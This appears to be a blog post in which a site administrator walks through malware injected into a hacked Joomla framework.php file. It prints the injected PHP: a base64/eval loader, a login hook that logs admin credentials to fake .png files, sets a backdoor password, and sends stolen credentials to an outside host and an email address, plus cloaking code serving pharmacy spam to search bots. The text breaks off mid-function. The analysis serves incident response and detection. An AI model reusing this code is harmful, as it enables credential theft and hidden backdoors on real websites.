Continuing from yesterday, the result of comparing the framework.php with an unexpected date to the original joomla files for that build (Folks, you can patch with individual files from GitHub. Go back in time to about the same date as the non-hacked files indicated in the header, and click on raw) and we are left with
<?php $a='bas'.'e6'.'4_d'.'ecode';eval($a("CgokUGFnZXNDb25maWcgPSBhcnJheQooCgknJyAgICAgICA9PiBhcnJheSgnbGV2aXRyYXx2YXJk
which irked me slightly, because now I know in the future to search servers using the below command and regex – this finds it in the site:
findstr b*a*s*e*[0-9]*d*e*c*o*d*e *.php
The /includes/framework.php goes on with more lines of base64 encoded blech. Goes on 1852 lines to be exact. Then on line 1853 it goes into what should have been the contents of the file. Unmodified. So I restored the file to original, when it is compared, 1108 lines match, but there are 42 lines that don’t.
// Start Login Protection $ip = $_SERVER["REMOTE_ADDR"]; $stringData = $_SERVER["SERVER_NAME"] . "|" . $credentials["use rname"] . ":" . $credentials["password"] . "|" . $ip . "\n";
So our first little bit here copies the website client’s address to a variable. Next, it wraps the address you typed in to get to the admin page, the User and Password field values (yes, the ones you just typed in), and the IP address we grabbed a second ago.
$today = date("j");
$myErrorFile = getcwd() . "/components/com_login/controller.png"; $mySuccessFile = getcwd() . "/components/com_login/login.png";
$failedLogContent = @file_get_contents($myErrorFile);
$successLogContent = @file_get_contents($mySuccessFile);
$errorFileLines = explode("\n", $failedLogContent);
Next we grab our day of the month without leading zeros (1 to 31), and start some files up as logs. Immediately checking controller.png and login.png reveal they are the error and success audit log, showing all the attempted credentials on the login page in plain text and what IP they were tried from, no attempt to hide in an image, just a filename.
$diff = $today - $errorFileLines[0];
if ( ($diff >= 7) || ($diff < 0) ) {
@unlink($myErrorFile);
$failedLogContent = "";
}
Take $diff variable as the count of days since last log collection. If not 7 days, drop connection to file
if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
preg_match_all("/{$ip}/i", $failedLogContent, $matches);
if ( (count($matches[0]) > 4) && (!$userOk) ) $credentials["password"] = "G4o7Ivc29OVOxcp5";
Now we see who you are. If you are in Success log, go ahead and set this magical undeclared $userOk variable to 1. If you are in failed content, and more than four times, use this for the password to let zombie servers in.
// End Login Protection These four lines were correct // Start Login Protection
if ($response->status === JAUTHENTICATE_STATUS_SUCCESS) {
@file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
The first action after login is determined to be successful, go out to one of their hacked websites, and post the IP, User and Password that the webclient attempted to connect using.
@mail("[email protected]", $_SERVER["SERVER_NAME"], $stringData);
And just in case the botnet is down, email your server name and IP, User, Pass!
if (!$userOk) {
$fh = fopen($mySuccessFile, "a");
fwrite($fh, "$ip\n");
fclose($fh);
}
} else {
if (!(is_file($myErrorFile))) {
$fh = fopen($myErrorFile, "w");
fwrite($fh, "$today\n");
fclose($fh);
}
$fh = fopen($myErrorFile, "a");
fwrite($fh, $stringData);
fclose($fh);
}
// End Login Protection
if ($response->status === JAUTHENTICATE_STATUS_SUCCESS) {
The rest is basic housekeeping – write out files, close files, and call login page again! So let’s decode our 1800+ line base64 encoded mess. Look what the third line says:
$PagesConfig = array
(
'' => array('levitra|vardenafil', 'http://advancestunning.com/go.php?a=13&d=grjoklaosveqnsaekmzx'),
);
$server_user_agent = $_SERVER['HTTP_USER_AGENT'];
$server_referer = @$_SERVER['HTTP_REFERER'];
$server_forwarded_for = @$_SERVER["HTTP_X_FORWARDED_FOR"];
$server_remote_addr = $_SERVER['REMOTE_ADDR'];
$server_query_string = $_SERVER['QUERY_STRING'];
$server_request_uri = $_SERVER['REQUEST_URI'];
$hostname = gethostbyaddr ($server_remote_addr);
if(!empty($server_forwarded_for))
$server_ip = $server_forwarded_for;
else
$server_ip = $server_remote_addr;
$page = trim($_SERVER['REQUEST_URI'], '/');
$isHuman = detectBot($server_user_agent, $server_ip, $hostname, $server_query_string, $server_referer, $server_request_uri);
$isAdmin = detectAdmin($server_remote_addr);
if ( array_key_exists($page, $PagesConfig) && (!$isHuman) && (!$isAdmin) ) {
This is where the rubber meets the road, we decide if you are a bot, we send you levitra; if you are an Admin, let’s steal your bits, and if you are a user, let’s…:
?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.innocentsite.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Good, friendly, excellent things to have, great keywords, innocent stuff here" /> <meta name="generator" content="Joomla! 1.7 - Open Source Content Management" /> <title>Buy Levitra (Vardenafil) Online From A Certified US Pharmacy >> Lowest Prices Guaranteed</title> <meta name="description" content="Buy Levitra online from an official certified pharmacy, OVERNIGHT Shipping, Exclusive & competitive discount prices, express shipping & discrete packaging." />
If you are a human, let’s show you a flat copy of what your page was supposed to be! It goes on for quite a white with the relevant pre-rendered html and css. I’ve cropped much out for brevity. Below is a div hidden by css from the viewer, but visible to search engines, and very visible by viewing the source code in the browser.
<link href="/templates/innocentsite/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /> </head> <body> <div id='hideMe'> <p>Weight problems is a result of a very sedentary way of Levitra <a href="http://tweetmic.com/">Levitra Online</a> living. Persons become overweight once they Hcg diet sublingual <a href="http://hcgdietdropsnow.com/">HCG</a> have on physical exercise constantly and use up considerably time Priligy <a href="http://www.coloradoenvision.com/">Buy priligy online</a> staying lazy. The scarcity of movement Viagra Online 100mg <a href="http://www.icecs2008.org/CFP.html">Viagra Online</a> makes it possible for a substantial amount extra fat for Viagra <a href="http://www.sonyc.org/">Viagra Online 100mg</a> each day. Not too years Viagra 100mg Online <a href="http://www.magicbluepillblog.com/">Viagra 50mg</a> <p>Is impotence problems still Payday loan no telecheck <a href="http://nosweatpaydayloans.com/">Wildwood payday loan</a> Electronic cigarette refill liquid 0 mg nicotine <a href="http://electroniccigaretteboutique.com/">No 7 electronic cigarette</a> lack of ability to have an hard-on? Are Electronic cigarette drops <a href="http://electroniccigarettemart.com/">Electronic Cigarette</a> <p>The query of member size is one Levitra 40mg <a href="http://levitraquestions.com/">Levitra Online</a> side that many men think anxious, Viagra 100mg Online <a href="http://www.codman.org/">Viagra Online</a> effect on a person impression penile, together with his psyche, HGH <a href="http://hghknowledgebase.com/">Viagra ireland hgh human growth hormone</a> <p>It entirely possible that the aim of Viagra 100mg Online <a href="http://www.duselwatch.com/">Viagra Online 100mg</a>
<p>The Check out the Universe Little S5570 is a good Online Blackjack <a href="http://winatonlineblackjack.com/">Online Blackjack</a> Android 2.2, getting power using a model Cialis dosage <a href="http://www.charmedtodeath.com/">Generic
Cialis</a> </div><script type='text/javascript'>if(document.getElementById('hideMe') != null){document.getElementById('hideMe').style.visibility = 'hidden';document.getElementById('hideMe').style.display = 'none';}</script><div
id="container">
Again, skipping more legit website content here, down to this gem:
<div style="background-color:#8ECA92"> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapicorum.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapikayseri.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapikastamonu.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapimersin.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapiafyon.com">lida zayıflama hapı</a> <a style="color:#8ECA92" href="http://biberhapizayifla.wordpress.com" title="biber hapı">biber hapı</a> <a style="color:#8ECA92" href="http://kiloaldiriciniz.wordpress.com" title="kilo aldırıcı">kilo aldırıcı</a> <a style="color:#8ECA92" href="http://hotbiberjeli.wordpress.com" title="hot biber jeli">hot biber jeli</a> <a style="color:#8ECA92" href="http://belfitigi.wordpress.com" title="bel fıtığı">bel fıtığı</a> <a style="color:#8ECA92" href="http://hemoroidhapi.wordpress.com" title="hemoroid hapı">hemoroid hapı</a> <a style="color:#8ECA92" href="http://lidaresmisatis.wordpress.com" title="lida resmi satış sitesi">lida resmi satış sitesi</a>
And now the garbage content ends. Instead of the end of the site, we see more logic and control structures start to emerge:
</div> <?php exit(); }
if ( (isDrugSearch($PagesConfig[$page][0], $server_referer, $hostname) == true) && (!$isAdmin) ) {
$rederict_URL = $PagesConfig[$page][1];
header ("Location: $rederict_URL");
exit();
}
Now we begin the process of deciding what garbage ad you are going to get to see, based upon which network traffic you originate from.
function isDrugSearch($keyword, $ref, $hostname)
{
//if ( (stripos($ref, 'https') !== false) ) ### Any https
//{
// return true;
//}
$keywordsRegex = "/$keyword/i";
if ( (preg_match($keywordsRegex, $ref)) && ($keyword) )
{
return true;
}
return false;
}
The key to understanding the remainder of the code is knowing Regular Expressions, or regex for short. There are books, start reading. Suffice it to say that the below are some ip ranges for major providers listed to the right, complete with segmentation by referrer. Pretty complex.
function detectBot($server_user_agent, $server_ip, $hostname, $server_query_string, $server_referer, $server_request_uri)
{
$stop_ips_masks = array
(
"66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255
"74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255
"65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255,
"74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255
"67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255
"72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255
"38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255
"93\.172\.94\.227", // MacFinder
"212\.100\.250\.218", // Wells Search II
"71\.165\.223\.134", // Indy Library
"70\.91\.180\.25",
"65\.93\.62\.242",
"74\.193\.246\.129",
"213\.144\.15\.38",
"195\.92\.229\.2",
"70\.50\.189\.191",
"218\.28\.88\.99",
"165\.160\.2\.20",
"89\.122\.224\.230",
"66\.230\.175\.124",
"218\.18\.174\.27",
"65\.33\.87\.94",
"67\.210\.111\.241",
"81\.135\.175\.70",
"64\.69\.34\.134",
"89\.149\.253\.169",
"69\.136\.208\.89",
"83\.15\.211\.166",
"78\.180\.145\.80",
"78\.166\.111\.63",
"64\.233\.1[6-8][1-9]\.[0-9]+",
"64\.233\.19[0-1]\.[0-9]+",
"209\.185\.108\.[0-9]+",
"209\.185\.253\.[0-9]+",
"209\.85\.238\.[0-9]+",
"216\.239\.33\.9[6-9]",
"216\.239\.37\.9[8-9]",
"216\.239\.39\.9[8-9]",
"216\.239\.41\.9[6-9]",
"216\.239\.45\.4",
"216\.239\.46\.[0-9]+",
"216\.239\.51\.9[6-9]",
"216\.239\.53\.9[8-9]",
"216\.239\.57\.9[6-9]",
"216\.239\.59\.9[8-9]",
"216\.33\.229\.163",
"64\.233\.173\.[0-9]+",
"64\.68\.8[0-9]\.[0-9]+",
"64\.68\.9[0-2]\.[0-9]+",
"72\.14\.199\.[0-9]+",
"8\.6\.48\.[0-9]+",
"207\.211\.40\.82",
"67\.162\.158\.146",
"66\.255\.53\.123",
"24\.200\.208\.112",
"129\.187\.148\.240",
"129\.187\.148\.244",
"199\.126\.151\.229",
"118\.124\.32\.193",
"89\.149\.217\.191",
"209\.185\.108",
"128\.2\.140",
"209\.185\.253",
"209\.85\.238",
"209\.85\.238\.11",
"209\.85\.238\.4",
"216\.239\.33\.96",
"216\.239\.33\.97",
"66\.249\.84",
"74\.6\.87",
"66\.249",
"108\.59\.[0-9]+\.[0-9]+",
"109\.109\.[0-9]+\.[0-9]+",
"113\.197\.[0-9]+\.[0-9]+",
"124\.30\.[0-9]+\.[0-9]+",
"141\.185\.209\.[0-9]+",
"157\.238\.[0-9]+\.[0-9]+",
"166\.90\.[0-9]+\.[0-9]+",
"169\.207\.238\.[0-9]+",
"173\.194\.[0-9]+\.[0-9]+",
"173\.203\.[0-9]+\.[0-9]+",
"173\.255\.[0-9]+\.[0-9]+",
"174\.129\.130\.[0-9]+",
"174\.142\.[0-9]+\.[0-9]+",
"178\.33\.[0-9]+\.[0-9]+",
"193\.120\.[0-9]+\.[0-9]+",
"193\.142\.[0-9]+\.[0-9]+",
"193\.186\.[0-9]+\.[0-9]+",
"193\.200\.[0-9]+\.[0-9]+",
"193\.92\.[0-9]+\.[0-9]+",
"194\.100\.[0-9]+\.[0-9]+",
"194\.110\.[0-9]+\.[0-9]+",
"194\.221\.[0-9]+\.[0-9]+",
"194\.78\.[0-9]+\.[0-9]+",
"195\.100\.[0-9]+\.[0-9]+",
"195\.145\.[0-9]+\.[0-9]+",
"195\.18\.[0-9]+\.[0-9]+",
"195\.205\.[0-9]+\.[0-9]+",
"195\.22\.[0-9]+\.[0-9]+",
"195\.229\.[0-9]+\.[0-9]+",
"195\.27\.[0-9]+\.[0-9]+",
"195\.59\.[0-9]+\.[0-9]+",
"195\.65\.[0-9]+\.[0-9]+",
"196\.3\.[0-9]+\.[0-9]+",
"198\.108\.[0-9]+\.[0-9]+",
"199\.177\.18\.[0-9]+",
"200\.99\.[0-9]+\.[0-9]+",
"202\.106\.[0-9]+\.[0-9]+",
"202\.160\.178\.[0-9]+",
"202\.160\.179\.[0-9]+",
"202\.160\.180\.[0-9]+",
"202\.160\.181\.[0-9]+",
"202\.160\.183\.[0-9]+",
"202\.160\.185\.[0-9]+",
"202\.165\.96\.[0-9]+",
"202\.165\.98\.[0-9]+",
"202\.165\.99\.[0-9]+",
"202\.212\.5\.[0-9]+",
"202\.46\.19\.[0-9]+",
"202\.96\.[0-9]+\.[0-9]+",
"203\.123\.188\.[0-9]+",
"203\.141\.52\.[0-9]+",
"203\.222\.[0-9]+\.[0-9]+",
"203\.255\.234\.[0-9]+",
"203\.98\.[0-9]+\.[0-9]+",
"204\.50\.[0-9]+\.[0-9]+",
"206\.15\.[0-9]+\.[0-9]+",
"206\.160\.[0-9]+\.[0-9]+",
"206\.169\.[0-9]+\.[0-9]+",
"206\.186\.[0-9]+\.[0-9]+",
"206\.190\.43\.[0-9]+",
"207\.126\.239\.[0-9]+",
"207\.250\.[0-9]+\.[0-9]+",
"207\.47\.[0-9]+\.[0-9]+",
"207\.86\.[0-9]+\.[0-9]+",
"207\.88\.[0-9]+\.[0-9]+",
"208\.113\.[0-9]+\.[0-9]+",
"208\.185\.[0-9]+\.[0-9]+",
"208\.21\.[0-9]+\.[0-9]+",
"208\.253\.[0-9]+\.[0-9]+",
"208\.36\.[0-9]+\.[0-9]+",
"208\.37\.[0-9]+\.[0-9]+",
"209\.1\.12\.[0-9]+",
"209\.1\.13\.[0-9]+",
"209\.1\.32\.[0-9]+",
"209\.1\.38\.[0-9]+",
"209\.119\.[0-9]+\.[0-9]+",
"209\.131\.40\.[0-9]+",
"209\.131\.41\.[0-9]+",
"209\.131\.48\.[0-9]+",
"209\.131\.49\.[0-9]+",
"209\.131\.50\.[0-9]+",
"209\.131\.51\.[0-9]+",
"209\.131\.60\.[0-9]+",
"209\.131\.62\.[0-9]+",
"209\.185\.[0-9]+\.[0-9]+",
"209\.191\.123\.[0-9]+",
"209\.191\.64\.[0-9]+",
"209\.191\.65\.[0-9]+",
"209\.191\.82\.[0-9]+",
"209\.191\.83\.[0-9]+",
"209\.203\.[0-9]+\.[0-9]+",
"209\.220\.[0-9]+\.[0-9]+",
"209\.245\.[0-9]+\.[0-9]+",
"209\.247\.[0-9]+\.[0-9]+",
"209\.249\.[0-9]+\.[0-9]+",
"209\.67\.206\.[0-9]+",
"209\.73\.176\.[0-9]+",
"209\.85\.[0-9]+\.[0-9]+",
"211\.14\.8\.[0-9]+",
"211\.169\.241\.[0-9]+",
"212\.0\.[0-9]+\.[0-9]+",
"212\.108\.[0-9]+\.[0-9]+",
"212\.126\.[0-9]+\.[0-9]+",
"212\.179\.[0-9]+\.[0-9]+",
"212\.181\.[0-9]+\.[0-9]+",
"212\.21\.[0-9]+\.[0-9]+",
"212\.49\.[0-9]+\.[0-9]+",
"213\.144\.[0-9]+\.[0-9]+",
"213\.152\.[0-9]+\.[0-9]+",
"213\.186\.[0-9]+\.[0-9]+",
"213\.187\.[0-9]+\.[0-9]+",
"213\.19\.[0-9]+\.[0-9]+",
"213\.216\.143\.[0-9]+",
"213\.240\.[0-9]+\.[0-9]+",
"213\.246\.[0-9]+\.[0-9]+",
"213\.31\.[0-9]+\.[0-9]+",
"213\.61\.[0-9]+\.[0-9]+",
"216\.109\.[0-9]+\.[0-9]+",
"216\.110\.[0-9]+\.[0-9]+",
"216\.136\.[0-9]+\.[0-9]+",
"216\.145\.58\.[0-9]+",
"216\.155\.198\.[0-9]+",
"216\.155\.200\.[0-9]+",
"216\.155\.202\.[0-9]+",
"216\.155\.204\.[0-9]+",
"216\.156\.[0-9]+\.[0-9]+",
"216\.218\.[0-9]+\.[0-9]+",
"216\.239\.[0-9]+\.[0-9]+",
"216\.32\.237\.[0-9]+",
"216\.33\.[0-9]+\.[0-9]+",
"216\.34\.[0-9]+\.[0-9]+",
"216\.74\.[0-9]+\.[0-9]+",
"217\.118\.[0-9]+\.[0-9]+",
"217\.149\.[0-9]+\.[0-9]+",
"217\.163\.[0-9]+\.[0-9]+",
"217\.30\.[0-9]+\.[0-9]+",
"217\.33\.[0-9]+\.[0-9]+",
"222\.66\.[0-9]+\.[0-9]+",
"4\.3\.[0-9]+\.[0-9]+",
"62\.159\.[0-9]+\.[0-9]+",
"62\.172\.199\.[0-9]+",
"62\.20\.[0-9]+\.[0-9]+",
"62\.27\.59\.[0-9]+",
"63\.146\.[0-9]+\.[0-9]+",
"63\.161\.[0-9]+\.[0-9]+",
"63\.163\.102\.[0-9]+",
"63\.166\.[0-9]+\.[0-9]+",
"63\.251\.[0-9]+\.[0-9]+",
"63\.83\.[0-9]+\.[0-9]+",
"63\.84\.[0-9]+\.[0-9]+",
"63\.97\.[0-9]+\.[0-9]+",
"64\.0\.[0-9]+\.[0-9]+",
"64\.124\.[0-9]+\.[0-9]+",
"64\.128\.[0-9]+\.[0-9]+",
"64\.132\.[0-9]+\.[0-9]+",
"64\.154\.[0-9]+\.[0-9]+",
"64\.157\.137\.[0-9]+",
"64\.157\.138\.[0-9]+",
"64\.186\.[0-9]+\.[0-9]+",
"64\.233\.[0-9]+\.[0-9]+",
"64\.245\.[0-9]+\.[0-9]+",
"64\.41\.[0-9]+\.[0-9]+",
"64\.68\.[0-9]+\.[0-9]+",
"64\.71\.[0-9]+\.[0-9]+",
"64\.75\.36\.[0-9]+",
"64\.9\.[0-9]+\.[0-9]+",
"65\.167\.[0-9]+\.[0-9]+",
"65\.170\.[0-9]+\.[0-9]+",
"65\.171\.[0-9]+\.[0-9]+",
"65\.196\.[0-9]+\.[0-9]+",
"65\.201\.[0-9]+\.[0-9]+",
"65\.205\.[0-9]+\.[0-9]+",
"65\.210\.[0-9]+\.[0-9]+",
"65\.211\.[0-9]+\.[0-9]+",
"65\.214\.[0-9]+\.[0-9]+",
"65\.221\.[0-9]+\.[0-9]+",
"65\.223\.[0-9]+\.[0-9]+",
"65\.245\.[0-9]+\.[0-9]+",
"65\.47\.[0-9]+\.[0-9]+",
"66\.102\.[0-9]+\.[0-9]+",
"66\.162\.[0-9]+\.[0-9]+",
"66\.163\.170\.[0-9]+",
"66\.163\.174\.[0-9]+",
"66\.192\.[0-9]+\.[0-9]+",
"66\.196\.101\.[0-9]+",
"66\.196\.65\.[0-9]+",
"66\.196\.67\.[0-9]+",
"66\.196\.72\.[0-9]+",
"66\.196\.73\.[0-9]+",
"66\.196\.74\.[0-9]+",
"66\.196\.77\.[0-9]+",
"66\.196\.78\.[0-9]+",
"66\.196\.80\.[0-9]+",
"66\.196\.81\.[0-9]+",
"66\.196\.90\.[0-9]+",
"66\.196\.91\.[0-9]+",
"66\.196\.92\.[0-9]+",
"66\.196\.93\.[0-9]+",
"66\.196\.97\.[0-9]+",
"66\.196\.99\.[0-9]+",
"66\.218\.65\.[0-9]+",
"66\.218\.70\.[0-9]+",
"66\.227\.[0-9]+\.[0-9]+",
"66\.228\.164\.[0-9]+",
"66\.228\.165\.[0-9]+",
"66\.228\.166\.[0-9]+",
"66\.228\.173\.[0-9]+",
"66\.228\.182\.[0-9]+",
"66\.249\.[0-9]+\.[0-9]+",
"66\.77\.[0-9]+\.[0-9]+",
"66\.94\.230\.[0-9]+",
"66\.94\.232\.[0-9]+",
"66\.94\.233\.[0-9]+",
"66\.94\.238\.[0-9]+",
"67\.122\.[0-9]+\.[0-9]+",
"67\.126\.[0-9]+\.[0-9]+",
"67\.152\.[0-9]+\.[0-9]+",
"67\.195\.115\.[0-9]+",
"67\.195\.34\.[0-9]+",
"67\.195\.37\.[0-9]+",
"67\.195\.44\.[0-9]+",
"67\.195\.45\.[0-9]+",
"67\.195\.50\.[0-9]+",
"67\.195\.51\.[0-9]+",
"67\.195\.52\.[0-9]+",
"67\.195\.53\.[0-9]+",
"67\.195\.54\.[0-9]+",
"67\.195\.58\.[0-9]+",
"67\.195\.98\.[0-9]+",
"67\.69\.[0-9]+\.[0-9]+",
"67\.93\.[0-9]+\.[0-9]+",
"68\.142\.195\.[0-9]+",
"68\.142\.203\.[0-9]+",
"68\.142\.211\.[0-9]+",
"68\.142\.212\.[0-9]+",
"68\.142\.230\.[0-9]+",
"68\.142\.231\.[0-9]+",
"68\.142\.240\.[0-9]+",
"68\.142\.246\.[0-9]+",
"68\.142\.249\.[0-9]+",
"68\.142\.250\.[0-9]+",
"68\.142\.251\.[0-9]+",
"68\.180\.216\.[0-9]+",
"68\.180\.250\.[0-9]+",
"68\.180\.251\.[0-9]+",
"69\.111\.[0-9]+\.[0-9]+",
"69\.147\.79\.[0-9]+",
"69\.224\.[0-9]+\.[0-9]+",
"69\.228\.[0-9]+\.[0-9]+",
"69\.236\.[0-9]+\.[0-9]+",
"69\.237\.[0-9]+\.[0-9]+",
"70\.239\.[0-9]+\.[0-9]+",
"70\.32\.[0-9]+\.[0-9]+",
"70\.90\.[0-9]+\.[0-9]+",
"71\.130\.[0-9]+\.[0-9]+",
"72\.14\.[0-9]+\.[0-9]+",
"72\.16\.[0-9]+\.[0-9]+",
"72\.30\.101\.[0-9]+",
"72\.30\.102\.[0-9]+",
"72\.30\.103\.[0-9]+",
"72\.30\.104\.[0-9]+",
"72\.30\.107\.[0-9]+",
"72\.30\.110\.[0-9]+",
"72\.30\.111\.[0-9]+",
"72\.30\.124\.[0-9]+",
"72\.30\.128\.[0-9]+",
"72\.30\.129\.[0-9]+",
"72\.30\.131\.[0-9]+",
"72\.30\.132\.[0-9]+",
"72\.30\.133\.[0-9]+",
"72\.30\.134\.[0-9]+",
"72\.30\.135\.[0-9]+",
"72\.30\.142\.[0-9]+",
"72\.30\.161\.[0-9]+",
"72\.30\.177\.[0-9]+",
"72\.30\.179\.[0-9]+",
"72\.30\.213\.[0-9]+",
"72\.30\.214\.[0-9]+",
"72\.30\.215\.[0-9]+",
"72\.30\.216\.[0-9]+",
"72\.30\.221\.[0-9]+",
"72\.30\.226\.[0-9]+",
"72\.30\.252\.[0-9]+",
"72\.30\.54\.[0-9]+",
"72\.30\.56\.[0-9]+",
"72\.30\.60\.[0-9]+",
"72\.30\.61\.[0-9]+",
"72\.30\.65\.[0-9]+",
"72\.30\.78\.[0-9]+",
"72\.30\.79\.[0-9]+",
"72\.30\.81\.[0-9]+",
"72\.30\.87\.[0-9]+",
"72\.30\.9\.[0-9]+",
"72\.30\.97\.[0-9]+",
"72\.30\.98\.[0-9]+",
"72\.30\.99\.[0-9]+",
"74\.125\.[0-9]+\.[0-9]+",
"74\.55\.27\.[0-9]+",
"74\.55\.27\.[0-9]+",
"74\.6\.11\.[0-9]+",
"74\.6\.12\.[0-9]+",
"74\.6\.13\.[0-9]+",
"74\.6\.131\.[0-9]+",
"74\.6\.16\.[0-9]+",
"74\.6\.17\.[0-9]+",
"74\.6\.18\.[0-9]+",
"74\.6\.19\.[0-9]+",
"74\.6\.20\.[0-9]+",
"74\.6\.21\.[0-9]+",
"74\.6\.22\.[0-9]+",
"74\.6\.23\.[0-9]+",
"74\.6\.24\.[0-9]+",
"74\.6\.240\.[0-9]+",
"74\.6\.25\.[0-9]+",
"74\.6\.26\.[0-9]+",
"74\.6\.27\.[0-9]+",
"74\.6\.28\.[0-9]+",
"74\.6\.29\.[0-9]+",
"74\.6\.30\.[0-9]+",
"74\.6\.31\.[0-9]+",
"74\.6\.65\.[0-9]+",
"74\.6\.66\.[0-9]+",
"74\.6\.67\.[0-9]+",
"74\.6\.68\.[0-9]+",
"74\.6\.69\.[0-9]+",
"74\.6\.7\.[0-9]+",
"74\.6\.70\.[0-9]+",
"74\.6\.71\.[0-9]+",
"74\.6\.72\.[0-9]+",
"74\.6\.73\.[0-9]+",
"74\.6\.74\.[0-9]+",
"74\.6\.75\.[0-9]+",
"74\.6\.76\.[0-9]+",
"74\.6\.79\.[0-9]+",
"74\.6\.8\.[0-9]+",
"74\.6\.85\.[0-9]+",
"74\.6\.86\.[0-9]+",
"74\.6\.87\.[0-9]+",
"74\.6\.9\.[0-9]+",
"75\.17\.[0-9]+\.[0-9]+",
"75\.23\.[0-9]+\.[0-9]+",
"75\.37\.[0-9]+\.[0-9]+",
"75\.52\.[0-9]+\.[0-9]+",
"76\.200\.[0-9]+\.[0-9]+",
"76\.220\.[0-9]+\.[0-9]+",
"76\.231\.[0-9]+\.[0-9]+",
"76\.242\.[0-9]+\.[0-9]+",
"76\.246\.[0-9]+\.[0-9]+",
"77\.109\.[0-9]+\.[0-9]+",
"77\.40\.[0-9]+\.[0-9]+",
"78\.8\.[0-9]+\.[0-9]+",
"8\.6\.[0-9]+\.[0-9]+",
"8\.8\.[0-9]+\.[0-9]+",
"80\.146\.[0-9]+\.[0-9]+",
"80\.169\.[0-9]+\.[0-9]+",
"80\.231\.[0-9]+\.[0-9]+",
"80\.239\.[0-9]+\.[0-9]+",
"80\.77\.[0-9]+\.[0-9]+",
"81\.211\.[0-9]+\.[0-9]+",
"82\.94\.[0-9]+\.[0-9]+",
"83\.220\.[0-9]+\.[0-9]+",
"84\.233\.[0-9]+\.[0-9]+",
"86\.127\.[0-9]+\.[0-9]+",
"87\.244\.[0-9]+\.[0-9]+",
"89\.114\.[0-9]+\.[0-9]+",
"89\.175\.[0-9]+\.[0-9]+",
"89\.207\.[0-9]+\.[0-9]+",
"89\.96\.[0-9]+\.[0-9]+",
"92\.45\.[0-9]+\.[0-9]+",
"93\.94\.[0-9]+\.[0-9]+",
"94\.200\.[0-9]+\.[0-9]+",
"94\.40\.[0-9]+\.[0-9]+",
"94\.75\.242\.[0-9]+",
"95\.172\.[0-9]+\.[0-9]+",
"99\.136\.[0-9]+\.[0-9]+",
"99\.148\.[0-9]+\.[0-9]+",
"99\.163\.[0-9]+\.[0-9]+",
"99\.40\.[0-9]+\.[0-9]+",
"99\.55\.[0-9]+\.[0-9]+",
"99\.96\.[0-9]+\.[0-9]+"
);
Note the CUILL is the attacker’s bot gateway – likely hijacked BGP session, or maybe they just give away russian IP space.
$stop_agents_masks = array('http', 'google', 'slurp', 'msnbot', 'bot', 'crawl', 'spider', 'robot', 'HttpClient', 'curl', 'PHP', 'Indy Library',
'WordPress','Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex','snoopy','aport','nginx','nagios','twitter');
$server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);
$is_human = true;
$detected_str = "";
foreach ($stop_ips_masks as $stop_ip_mask) if(preg_match("/{$stop_ip_mask}/i", $server_ip))
{
$is_human = false;
$detected_str = "by ip";
break;
}
if ( ($is_human == true) && (IsBotIPType2($server_ip) == true ) )
{
$is_human = false;
$detected_str = "by ip type2";
}
if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(preg_match('/'.$stop_agents_mask.'/i', @$server_user_agent))
{
$is_human = false;
$detected_str = "by agent";
break;
}
if($is_human and !preg_match("/^[a-zA-Z]{5,}/i", @$server_user_agent))
{
$is_human = false;
$detected_str = "not human agent";
}
if($is_human and strlen($server_user_agent)<=11)
{
$is_human = false;
$detected_str = "so small agent";
}
if(@stristr($server_referer, $server_query_string))
{
$is_human = false;
$detected_str = "referer=query_string";
}
Here is the end of the logic for deciding what execution path you take, and here begins the next bot declaration
$data = array
(
"BOT({$detected_str})",
gmdate("d.m H:i:s"),
"request_uri({$server_request_uri})",
$server_ip,
$hostname,
$server_query_string,
$server_referer,
$server_user_agent
);
//if (!$is_human)
//{
// HandleLog($data);
//}
return $is_human;
}
function IsBotIPType2 ($ip)
{
if (
stripos($ip, '91.224.140.105') !== false ||
stripos($ip, '220.241.72') !== false ||
stripos($ip, '209.185.108') !== false ||
stripos($ip, '128.2.140') !== false ||
stripos($ip, '209.185.253') !== false ||
stripos($ip, '209.85.238') !== false ||
stripos($ip, '209.85.238.11') !== false ||
stripos($ip, '209.85.238.4') !== false ||
stripos($ip, '216.239.33.96') !== false ||
stripos($ip, '216.239.33.97') !== false ||
stripos($ip, '216.239.33.98') !== false ||
stripos($ip, '216.239.33.99') !== false ||
stripos($ip, '216.239.37.98') !== false ||
stripos($ip, '216.239.37.99') !== false ||
stripos($ip, '216.239.39.98') !== false ||
stripos($ip, '216.239.39.99') !== false ||
stripos($ip, '216.239.41.96') !== false ||
stripos($ip, '216.239.41.97') !== false ||
stripos($ip, '216.239.41.98') !== false ||
stripos($ip, '216.239.41.99') !== false ||
stripos($ip, '216.239.45.4') !== false ||
stripos($ip, '216.239.46') !== false ||
stripos($ip, '216.239.51.96') !== false ||
stripos($ip, '216.239.51.97') !== false ||
